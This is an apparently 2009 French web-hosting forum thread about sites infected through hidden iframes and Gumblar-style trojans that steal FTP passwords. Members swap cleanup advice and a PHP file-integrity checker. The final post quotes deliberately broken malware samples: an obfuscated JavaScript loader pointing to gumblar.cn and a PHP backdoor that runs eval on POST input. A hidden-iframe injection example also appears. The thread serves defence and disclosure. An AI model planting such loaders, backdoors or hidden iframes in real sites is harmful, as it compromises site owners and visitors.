Pas de quoi. :) Mais, bon, évidemment, si tu trrouve des fichiers indésirables, c'est que tu auras été infecté et que ces fichiers auront peut-être déjà commencé leur travail nuisible.

Ces attaques ne se font pas que sur OVH, infomaniak également.

J'ai comme vous le même problème, je suis ne suis pas très patient avec les virus si les méthodes traditionnelles ne fonctionnent pas je formate win-merde et je réinstalle. Mais dans ce cas avec ces toyans ( qui visiblement apporte leurs amis toyan ).

si vous avez LA méthode pour les supprimer ... ...

Amicalement a vous tous ...

Evidemment non, OVH n'est pas le seul touché !:eek: Tout le web est touché. Le Suisse que tu cites, Servage, Planethoster, tous les autres, et les sites hébergés sur dédiés... Tout le monde.

Maintenant, si tu veux LA méthode... Il n'y en a pas. Ce que je connais, c'est ce que j'ai mis dans le How-To et quelques postes qui suivent. C'est long et c'est pas drôle.

Il suffit d'un tag de CSS style="visibility: hidden". Tu as l'exemple dans le code-type en une ligne que je donne au début.

Par exemple :
<iframe src="http://www.ovh.com" width=107 height=152></iframe>
est un iframe visible, mais
<iframe src="http://www.ovh.com" width=107 height=152 style="visibility: hidden"></iframe>
est un iframe invisible. Il suffit ensuite qu'il soit bien placé dans la page, mais on peut évidemment faire plus sophistiqué !




Le code, par définition, sera toujours visible. C'est l'iframe qui peut être dissimulé. Toutefois, comme expliqué dans mon How-To, le code peut être habilement dissimulé et ne plus être la simple ligne citée dans mon premier example.

Toutefois, si l'injection du code malveillant supprime du "bon" code sur la page, c'est que l'on a affaire à quelqu'un de peu doué (mais le code reste dangereux), car, par principe, un système viral malveillant ne doit pas éveiller les soupçons du propriétaire de site.

Edit 5 août 2009: typographie


Bof bof le coup de l'iframe invisible, si tu met une iframe avec 0px sur 0px tu auras la même chose, à part un micro carré noir pratiquement indétectable.

Quand tu parles "qu'on peut évidemment faire plus sophistiqué !" tu fais allusion à quoi comme procéder de camouflage ?
Par ce que là je ne voix pas ce qu'on peut faire de plus ...

Bof bof le coup de l'iframe invisible, si tu met une iframe avec 0px sur 0px tu auras la même chose, à part un micro carré noir pratiquement indétectable.

Je parle de ce qui existe, des codes que l'on trouve et qui piègent actuellement des dizaines de milliers de sites. Je ne donne pas de conseils pour les Nuisibles ! Cela dit, ton point noir sur fond blanc... Le choix entre invisible et presque invisible est vite fait ! :cool:

Quand tu parles "qu'on peut évidemment faire plus sophistiqué !" tu fais allusion à quoi comme procéder de camouflage ?
Par ce que là je ne voix pas ce qu'on peut faire de plus ...

Lire le How-to et voir comment on utilise function par exemple.

Bonsoir,

Mes fichiers infectés sont des index.php, index.htm ou html , même des fichiers index_xxxx.yyy
Puis des fichiers defaut.php , defaut_access.php et maintenance.php

A noter que depuis que j'ai mis TOUS mes fichiers index.yyy en lecture seule ,
( soit en 444 ) plus de problème avec eux

Important, absent 4 jours, PC éteint , aucune attaque
Premier problème 1heure après avoir rallumé le PC.
Je soupçonne Fillezilla, pourtant j'ai changé le MdP de FTP depuis un autre PC

Passé le PC avec Avast, Ccleaner, et MalwareBytes

A voir cette page et l'utilisation d'un script scan_files.php
http://www.danielansari.com/wordpress/2009/05/automatic-removal-of-gumblarmartuz-trojan/
Pas fini de tester l'efficacité .

Ca commence à me .....
A+
Christian

A noter que depuis que j'ai mis TOUS mes fichiers index.yyy en lecture seule , ( soit en 444 ) plus de problème avec eux


:) D'où mon conseil sur les permissions dans
http://forum.ovh.com/showpost.php?p=301965&postcount=19 (voir les autres ! )
Bon, d'accord, il faut vraiment que je l'intègre dans mon How-To.

A voir cette page et l'utilisation d'un script scan_files.php
http://www.danielansari.com/wordpress/2009/05/automatic-removal-of-gumblarmartuz-trojan/
Pas fini de tester l'efficacité .

Je vais lire ça, merci du lien. :)

J'ai modifié le How-To pour y incorporer divers réponses que j'ai faîtes sur des points importants et d'autres ajouts.

22 août 2009 :
- ajout d'information sur les caches des navigateurs,
- les pages mises en cache sur le FTP par les CMS, forums, etc.,
- la sécurité par modification des droits sur les fichiers et dossiers,
- usage de clients FTP Linux,
- divers petits changements

Bonjour tout le monde, je connais une personne qui a été infecté aussi, elle avait aussi filezilla, soit dit en passant, filezilla est une cible de choix, tout les login & pass sont stocké en clair dans un vulgaire fichier xml... :eek:

Désolé j'ai pas eu le temps de tout lire, mais j'ai pensé a un système assez simple pour vérifier l'intégrité de n'importe quel ficher :

Inclure un fichier 'check.php' par ex. dans votre index (ou tout autre fichiers) :
<?php

if (md5_file("index.php") != "1e7f5e4ca4db2266c1d5fc4aa003931f")
mail("moi@gmail.com","Site Modifié !","Le site xxx.com a été modifié !");

?>
pour obtenir 1e7f5e4ca4db2266c1d5fc4aa003931f, il suffit de faire : echo md5_file("index.php"); // (ne pa mettre ce code dans l'index, sinon le hash sera modifier une foi le code supprimé xd)

C'est juste une base, il est évident qu'il ne faut pas faire juste un mail(); (déjà pour éviter d'être floodé xD), on peu imaginer un système de restauration automatique, ou fermer le site automatiquement en cas de modification ect... je réinvente peut-être le fil a couper le beurre, dsl si j'ai raté des posts qui traitais de cette solution.

:D Excellente idée, Equilibrius ! J'ajouterai ça au How-To prochainement. Il faudra un script plus élaboré évidemment.

Donc, ce que propose Equilibrius :

Est une mesure d'avertissement de contamination.

Cette mesure permet d'éviter l'examen manuel des fichiers.

Elle ne constitue PAS une mesure de protection contre la contamination.


La procédure est la suivante :

Pour tous les fichers critiques, notamment les index mais aussi ceux servant à générer les pages index dans les systèmes de templates de CMS, forums, etc., on crée un HASH (signature, ici, avec md5_file, ce sera un nombre de 32 caractères hexadécimaux) pour le fichier.

On garde trace de cette signature chez soi pour plus dé sécurité.

On fait un script - aussi bien dissimulé que possible- qui recalcule le HASH de chaque fichier régulièrement (par une tâche CRON par exemple) et qui va comparer ce HASH à celui que l'on avait obtenu.

En cas de différence, le script vous prévient par email, ou par un autre moyen. (Possibilité de faire des choses plus compliquées évidemment.)

Vous vérifiez ce qui s'est passé.

Couplé a un cron et le tour est joué comme tu le dit, pour camoufler le système, on peux imaginer ceci :
<?php eval(base64_decode("le_code_php_passé_à_base64_encode")); ?>
Niveau Alerte on peu aller encore plus loin, en envoyant des sms par exemple :p

Si quelqu'un voudrait réaliser un système de ce style sur son site, mais n'a pas forcement toutes les connaissances pour, je veux bien poster un script plus poussé sur demande.

Equilibrius; si tu as le temps, je pense que ce serait une excellente idée de poster ton script. De cette manière, on pourrait éventuellement y collaborer, et, de toutes façons, ce serait très utile ! :)

Voilà, tu vas devenir riche et célèbre ! :cool:

tu vas devenir riche et célèbre ! :eek: Que demander de plus !

J'ai encore quelques jours de vacances devant moi, je posterai dans le courant de la semaine :D

Ps : je prend aussi les CB.

D'une manière générale, on peut vérifier la date d'ajout et de modification des fichiers sur le serveur. On voit de suite si un fichier a été modifié depuis x jours. J'ai fait un script dans ce sens:
http://forum.ovh.com/showpost.php?p=104517

On peut aussi utiliser des outils tout fait pour vérifier l'intégrité des fichiers
(s'assurer que le contenu n'a pas été altéré, que ça soit des scripts PHP
ou n'importe quel autre fichier du système) .

Voir là par exemple : http://forums.ovh.com/showpost.php?p=300490&postcount=91

J'ai trouvé une petite commande sur http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/

grep -H “eval(base64_decode” /var/www/vhosts/* -R | cut -d: -f1 > /tmp/results_scan

Quelqu'un peut expliquer ce que fait exactement cette commande svp. :D
D'après ce que je suppose, ça déplace tous les fichiers qui contiennent des lignes en base 64 mais je ne suis pas sur, je voudrais juste voir les emplacements sans les supprimer ou déplacer.
Merci.

Edit*
J'ai testé le script de "enycu", ça tourne très très bien.

Salut,

@enycu : Se baser sur la date de modification (on a accès a la date de création sous unix ??) n'est pas une bonne solution je pense, on peu facilement antidater n'importe quel fichier avec php (avec une fonction de base, je parle même pas de ce qu'on pourrais faire avec un accès ssh)

Ce simple script antidate "tonfichier.php" d'un an :
<?php touch("tonfichier.php", time()-(60*60*24*30*12), time()-(60*60*24*30*12)); ?>

J'ai pas pu vérifier, mais il me semble que sur certaines distrib, le fait de modifier un chmod change aussi la date de dernière modification d’un fichier [a vérifier].

Les autres solutions proposé seront sûrement plus adapté ou/et plus performantes que mon script, mais elles nécessitent toutes (celles que j’ai vu) un niveau élevé de droits sur la machine sur laquelle on veux les utiliser, ce que n'ont pas la plus par des utilisateurs d'hébergement mutualisé.

Fini de parler, place au script : checkSetup.php

<?php

set_time_limit(0);

$imgDir = "http://www.lenumeriquefacile.com/var/telecom/storage/images/media/images/images_ordinateur/icone_dossier/1244-1-fre-FR/icone_dossier_large.png";

// Futur fichier de vérification
$check_php = '$sum = \'__SUM__\';
$hashs = file_get_contents($sum);
$modif = \'\';
$tabHash = explode("\n",$hashs);
$hacked = false;
if (filesize($sum) != __SIZE__) $hacked = true;
foreach($tabHash as $ligne)
{
$tmp = explode(";",$ligne);
if (isset($tmp[0]) && preg_match("/[a-f0-9]{32}/i",$tmp[1])) // Si le nom du fichier et le hash sont bien formé, on vérif
{
if (@md5_file($tmp[0]) != $tmp[1])
{
$hacked = true;
$modif .= "\t\n".$tmp[0];
}
} else $hacked = true;
}

if ($hacked)
{
$time = @file_get_contents("time.tmp");

if ($time === false || !is_numeric($time) || $time < time()-(60*60))
{
file_put_contents("time.tmp",time());
mail("__DEST__","[!!] Site compromis","http://".$_SERVER[\'SERVER_NAME\']."\n\nLes fichiers suivant on été modifié :\n\n".$modif);
}

die(\'Erreur : L\\\'intégrité de certains fichiers du site a été compromis.\'); // On stope tout pour protéger les visiteurs.
}';

if (isset($_POST['fichier']) && is_array($_POST['fichier']) && isset($_POST['mail'])) // Si le form est validé
{
$sum_txt_name = 'sum.txt';
// Génération aléatoire du nom du fichier de véritication
do { $check_php_name = str_shuffle(preg_replace("/[0-9]/",'',substr(md5(rand()),-8).str_rot13(substr(md5(rand()),-8)))).'.php'; } while(is_file($check_php_name));

//Création du futur fichier 'sum.txt':
$sum_txt = '';
foreach($_POST['fichier'] as $fichier)
$sum_txt .= $fichier.';'.md5_file($fichier)."\n";


$size_sum = strlen($sum_txt)+33+strlen($check_php_name);
$check_php = str_replace(array('__DEST__','__SUM__','__SIZE__') , array($_POST['mail'], $sum_txt_name, $size_sum),$check_php);
$check_php = '<?php eval(base64_decode(\''.base64_encode($check_php).' \')); ?>';

$sum_txt .= $check_php_name.';'.md5($check_php)."\n";

//Ecriture des fichiers
$res = file_put_contents($check_php_name,$check_php);
file_put_contents($sum_txt_name,substr($sum_txt,0,-1));
file_put_contents('time.tmp','');

if($res)
echo '[ok] Fichier de vérification automatique : <a href="'.$check_php_name.'" target="_blank">'.$check_php_name.'</a><br>'
.'[ok] Fichier contenant les hash : <a href="'.$sum_txt_name.'" target="_blank">'.$sum_txt_name.'</a>';
else
echo '[ko] Une erreur c\'est produite !';
}

function scandir_r($dossier = '.')
{
global $imgDir;

$dirTrie = array();

$dir = scandir($dossier);

foreach($dir as $res) // On trie les fichier en premier suivit des dossier, question d'afficahge
if (is_dir($res))
array_push($dirTrie,$res);
else
array_unshift($dirTrie,$res);

echo '<br/><div style="padding-left:40px;"><img width="16" height="16" src="'.$imgDir.'">'.$dossier;

foreach($dirTrie as $res)
{
$path = $dossier.'/'.$res;
if ($res != '.' && $res != '..')
{
if (is_dir($path))
scandir_r($path);
else
echo '<br/><input name="fichier[]" '.((preg_match("/index/i",$res)) ? 'class="index" ' : '').'type="checkbox" value="'.$path.'"> '.$res;
}
}

echo '</div>';
}

if (!is_writable('.')) echo '<span style="color:#f00">!! Le dossier doit avoir les droit d\'écriture</span><br/>';
if (file_exists('time.tmp') && !is_writable('time.tmp')) echo '<span style="color:#f00">!! Le fichier time.tmp doit avoir les droit d\'écriture</span><br/>';

echo '<script>
function selectIndex()
{
var indexs = document.getElementsByClassName("index")
for (var i=0; i<indexs.length; i++)
indexs[i].checked = (indexs[i].checked) ? false : true;
return false;
}
</script>
<div style="font-family:verdana;">
<hr><a href="#" onclick="selectIndex();">Sélectionner tout les index</a><hr>';

echo '<form action="" method="POST">';

scandir_r();

echo '<center>Votre mail : <input name="mail"><br/><br/><input type="submit" value="Créer les fichiers de vérification !"></center></form></div>';

?>

(Bien sur, c'est qu'une ébauche, on peu faire encore plus poussé)
Principe de fonctionnement :

4 Fichiers utilisé en tout :
- checkSetup.php : la base, le script qui génère les autres fichiers, où vous sélectionnez les fichiers a vérifier (index & co)
- time.tmp : contient la date de la dernière erreur trouvé (pour éviter de recevoir des dizaine de mail)
- sum.txt : contient l'emplacement du/des fichier a vérifier ainsi que sa signature
- $aleatoire.php : le script qui effectuera les vérifications (appel direct : page blanche = tout est ok, sinon die(site fermé); )

Dans la fourbitude la plus totale, j'ai fait en sorte que le système soit pas ou peu 'détectable', le fichier principal a un nom aléatoire, et sa source n'est pas lisible au premier coup d'œil, 'sum.txt' contiens les hash et sert de honeypot (http://www.google.fr/search?hl=fr&q=define%3Ahoneypot&btnG=Rechercher&meta=) (pigeon), vu que son intégrité est aussi vérifié :rolleyes: .


Niveau cron, pour les personnes qui n'en ont pas envi, suffit d'inclure $aleatoire.php dans l'index principal et ajouter quelques lignes pour faire une vérifications que toutes les x heures :

$time = @file_get_contents("time2.tmp");
if ($time === false || !is_numeric($time) || $time < time()-(60*60)) // Remplacez 60*60 par la duré maximale en seconde séparant 2 vérifications
{
file_put_contents("time2.tmp",time());
include("monfciherdeverif.php");
}

Donc toutes les heures (ou moins si vous avez pas de visiteurs en continu) le script sera exécute, bien sur dans ce cas, il vaut mieux pour l'utilisateur que la liste des fichiers à vérifier ne soit pas trop longue...

The END :D

Ps : pour éviter le hotlink, on peu remplacer
$imgDir = "http://www.lenumeriquefacile.com/var/telecom/storage/images/media/images/images_ordinateur/icone_dossier/1244-1-fre-FR/icone_dossier_large.png";

par $imgDir = "data:image/png;base64,"
."iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAABcSAAAXEgFnn9JSAAAKT2lDQ1BQaG90b3No b3AgSUNDIHByb2ZpbGUAAHj"
."anVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSogho dkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xu ja9a89+bN/rXXPu"
."es852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAiz ZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUA"
."EB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl 7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtA DBJV2ZIALC3AMDO"
."EAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAA B4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKB NA/g88wAAKCRFRH"
."gg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxE"
."JbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+"
."wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGi D4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzB"
."C/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaT cA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCD"
."JiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxl IGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2g P2o8+Q8cwwOgYBz"
."PEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXA CTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0Jr oR+cQYYjIxh1hIL"
."CPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs 0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U +IoUspqShnlEOU0"
."5QZlmDJBVaOaUt2ooVQRNY9aQq2htlKvUYeoEzR1mjnNgxZJS6 WtopXTGmgXaPdpr+h0uhHdlR5Ol9BX0svpR+iX6AP0dwwNhhWD x4hnKBmbGAcYZxl"
."3GK+YTKYZ04sZx1QwNzHrmOeZD5lvVVgqtip8FZHKCpVKlSaVG yovVKmqpqreqgtV81XLVI+pXlN9rkZVM1PjqQnUlqtVqp1Q61M bU2epO6iHqmeob1"
."Q/pH5Z/YkGWcNMw09DpFGgsV/jvMYgC2MZs3gsIWsNq4Z1gTXEJrHN2Xx2KruY/R27iz2qqaE5QzNKM1ezUvOUZj8H45hx+Jx0TgnnKKeX836K3hT vK"
."eIpG6Y0TLkxZVxrqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5 Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb 6fe"
."eb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSR udE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbm"
."mKaY7TDtMx83MzaLN1pk1mz0x1zLnm+eb15vft2BaeFostqi2u GVJsuRaplnutrxuhVo5WaVYVVpds0atna0l1rutu6cRp7lOk06 rntZnw7Dxtsm2qb"
."cZsOXYBtuutm22fWFnYhdnt8Wuw+6TvZN9un2N/T0HDYfZDqsdWh1+c7RyFDpWOt6azpzuP33F9JbpL2dYzxDP2DP jthPLKcRpnVOb00dnF2e5c4Pzi"
."IuJS4LLLpc+Lpsbxt3IveRKdPVxXeF60vWdm7Obwu2o26/uNu5p7ofcn8w0nymeWTNz0MPIQ+BR5dE/C5+VMGvfrH5PQ0+BZ7XnIy9jL5FXrdewt6V3"
."qvdh7xc+9j5yn+M+4zw33jLeWV/MN8C3yLfLT8Nvnl+F30N/I/9k/3r/0QCngCUBZwOJgUGBWwL7+Hp8Ib+OPzrbZfay2e1BjKC5QRVBj4 KtguXBrSF"
."oyOyQrSH355jOkc5pDoVQfujW0Adh5mGLw34MJ4WHhVeGP45wi Fga0TGXNXfR3ENz30T6RJZE3ptnMU85ry1KNSo+qi5qPNo3ujS 6P8YuZlnM1VidWE"
."lsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQ RAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7"
."JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZB xQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2Q qboVFoo1yoHsmdl"
."V2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2K m3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wt"
."VCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG 4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9 WtO319kXbL5fNKN"
."u7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7 z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HI"
."w6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq 3nr8R9sf"
."D5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32 oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrl"
."ca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9q wHeg89HcR/cGhYPP/p"
."H1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo"
."98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAgY0hSTQAAeiUAAICDAAD5/wAAgOkAAHUwAADqYAAAOpgAABdvkl/FRgAAAt1JREFUeNqE"
."0s9rI2Ucx/H3MzNpGhP7I3aTNGnEolhWaKxC1VtTQVhK7UbKlh6LIOxJocJu xUsPPS/sf+BJXNyL4EkRD1bwEEr30KXdtdolP+oWd5JMZob5+Tx7iJV"
."Fyvr+A1584fMVSik2NzeZnZ1lb2/PmJiY+NhxnF2l1P1ut0uxWKTft1FKEgQB+Xwe0zSJ45g4jjEAp qenP0un03+Pj4//fPnyGzcrldnbx8fHP+7v73"
."/jed73vu9bhqGjlCIMQ+I45jx9e3ubZrP55fLy8hczM6+vh2GUA 5EqlYozlcqbq1NTU9d0XZtyHOcJMD4399bXURS/6Dj2A03TfAOg2Wz+FgTBh7lcv"
."nTpUg7btjk7O8O2n5BMDr9WrVZvzM/Pf/rw4e+H5XJ5LpvNfrC7+4tr2/2vDIDT09P7pmkyNjaGUgrDMCgUCriui2manJw8QggxXCjk5xzH xvM8fN/P"
."m6aJBtDpdI7a7bbvui5xHBOGIWEYAjA6OkqpVAQU7XYb3w9wHA fgJV03BoDv+382m80/+v0+54iUEoAoilBKkclkUApc18GyLOI4HtE0bQAIIbxGo/G"
."T53m4rovneQRBQBRF/2JCCKSUWJaN47hIKVNCiAGglKLVat3p9/v8FznfW9M0ACzLIooigAQw+IN6vY6U8tdcLvfd2tra1V6vhxAC XR9sL6VEKUU6/Q"
."JB4BNFAUoRaZoYAAcHBwBqZ2fnumma5urq6no2m01ZloWUEk3T CMOQoaEEuq7jeT5KyS4IhFIKIQTPNFwul9/Z2Nj4pFar1VKpVKbb7dLr9YjjmFarx"
."cnJI+7d2/+8Xq/fugjQAAWkJycn315ZWfloaWmpViwWX+l0Ojx+/BeHhw+4e/fb9aOjozsXAc9COpBMJpOvVqvV9xcXF69UKpX3Go3GyNbW1tVO p/MD"
."Sin+Jw0YAjLAy4VC4crCwsLNRCLxLjDyvAsuyjhf7h/UeToAY86Y7wlCpZsAAAAASUVORK5CYII=";Bon ok, je chipote un peu :$

Bonjour à tous

je me suis inscrite au forum pour vous montrer à quoi ressemble une page contaminée avec le iframe mais je n'arrive pas à joindre une photo à ma réponse :confused: (disons sans l'uploader sur mon espace ovh car j'essaie d'y accéder le moins possible si vous voyez ce que je veux dire....:cool:)

merci

Bonjour, tu peux utiliser un de ces sites : imageshack.us (http://imageshack.us/), imagup.com (http://www.imagup.com/) ou monsterup.com (http://www.monsterup.com/), puis envoi le lien.

ou mieux encore :
http://demo.ovh.net

Une solution ???
Moi aussi j'ai eu pas mal de problème avec un site communautaire, pas mal de monde travaillant sur ce site, les logins / password FTP se sont retrouvés sur pas mal de PC et forcément le site s'est fait "Hacké:mad:" par des injections d'iframes.

Le problème est qu'on avait pas réellement de backup, ont travaillaient tous directement sur le serveur... Bref, la galère...:eek:

Finalement, j'ai copier/coller ce petit programme : Iframe.Attack v1.1 : http://www.kawablog.com/scarabox/product.php?id_produit=1&id_rub=2
directement dans la racine du site et il a tout nettoyé assez rapidement et pourtant, on à plus de 6000 fichiers sur notre serveur :cool:. ATTENTION Faut tout de même débourser 15euro... Mais bon, c'est réglé.

Pour info, même avec notepad++, c'est pas évident le nettoyage car, sur notre serveur, on à remarqué que plusieurs types d'iframe avaient été injectées...

Goodluck:):):) sami

Samira
merci de ton lien super utile

dis-moi tu sais si ce logiciel est mis à jour de la part des réalisateurs afin que l'on puisse detecter de nouvelles idées géniales des hackeurs?
il est peut-être codé par les mêmes qui ont inventé le virus...:mad:

merci, je pense que ça vaut la peine de payer s'il est vraiment bien;
:cool:

merci encore et courage à vous aussi .. en ce moment je suis en train de tout vider sur mon espace web et tenter de recommencer à zero.

merci encore

JE REVIENS CAR JE LIS SUR LE SITE: Bien entendu, l'opération de nettoyage avec Iframe.Attack doit bien évidemment être complétée par un nettoyage complet de votre machine de travail (Les antivirus tels que par exemple Avast ou Kasperky,... repèrent bien ce type de trojan et permettent sont éradication). N'oubliez pas non plus de changer de mot de passe de vos serveurs FTP attaqués, ainsi, vous éviterez toute re-contamination.

J'ai Avast qui est constamment à jour, constamment en train de contrôler mon poste et déjà deux fois dans la semaine j'ai lancé un scan total de mes disques; Avant n'a absolument rien trouvé sur mon poste, j'ai un seul poste se connectant via ftp à mon espace web.
Donc je ne suis pas sûre que Avast trouve la source du problème sur mon PC par contre il est vrai qu'il trouve le virus si je me connecte sur mon site web infecté.
Comment arrivent-ils ces premiers fichiers, ce qui font démarrer toute la chaine vers la galère???? c'est ça que j'aimerais savoir.

C'est ça la question les tous premiers fichiers !!!! d'où viennent-il !!!
merci si vous avez la réponse

Salut, la plus part du temps, tout les problèmes lié à la sécurité viennent du fait que les utilisateurs sont naïf ou/et suivent peux (voir aucune) de règle de sécurité, premièrement aux niveau des mot de passe, un pass de 6 chiffres est inutile, mieux vaut créer un gros pass aléatoire avec des lettres, des chiffres et des "caractères spéciaux" genre $ ^ ! : ect..
Et utiliser des pass différent pour le maximum de choses. C'est la base, évident me direz-vous… ensuite il y a pas mal de possibilité pour voler des login, si vous utilisez des réseau non sécurisé, les trojans ne sont qu'un vecteur parmi t'en d'autres…

Peut-être que ton ordi est clean, mais sa ne veux pas dire que le virus n'y a pas fait un tour, passe a l'AV tout tes support amovible, une simple clé avec un autorun modifié et un petit .bat ou .com caché peu suffir a voler presque n'importe quelles données…

Ensuite, une fois les login volé, des réseaux de machine prennent la relève et se connectent directement a ton ftp, télécharge tout les index.xxx, injecte le code et renvoi sur le serveur.. j'ai déjà vue des log de ce type d'attaque, et sa fait limite froid dans le dos vu le nombre de pc qui ouvre des connexions vers le serveur ftp :s

La parade ultime reviendrait à n'autoriser que les connexions qui viennent de telle ou telle ip au niveau du serveur FTP, comme dit plus haut. Certain hébergeur web proposent ce service.

Ps : payer un soft pour faire ça, c'est limite louche, rien ne remplacera une bonne gestion des backup, une surveillance constante et des règles stricte d'utilisation, après pour les projet de groupe, une solution se trouve peut-être avec les web-ftp =)

Oui... :) C'est très bien que quelqu'un crée un logiciel pratique pour lister tous les tags iframes sur les fichiers d'un site, et il n'y a aucun problème pour qu'il veuille le faire connaître et gagner de l'argent avec, puisqu'il fournit un travail réel et utile, et qui simplifie la vie.

Là où j'ai un problème, c'est quand on vous annonce que le serveur est propre ou que c'est la solution. Parce que, depuis le début, j'ai indiqué que ce type d'attaques n'utilise pas systématiquement du tout un tag iframe ! Et ceci depuis Martuz et les premières variantes de Gumblar.
(C'est pour cela que j'ai titré "Attaques Sites Web par Iframes (et similaires)"
Donc, ça aide indéniablement pour les iframes, mais pas plus.

Que fera un chercheur de tag iframe dans les cas suivants (réels et observés à plusieurs reprises) qui relèvent du même processus d'infection que les simples iframes ?

(Codes altérés, par sécurité)
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin CASSE PAR SECURITE + CASSE PAR SECURITE "3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22) CASSE PAR SECURITE "3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22" CASSE PAR SECURITE 2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e CASSE PAR SECURITE ("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3'])) CASSE PAR SECURITE
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
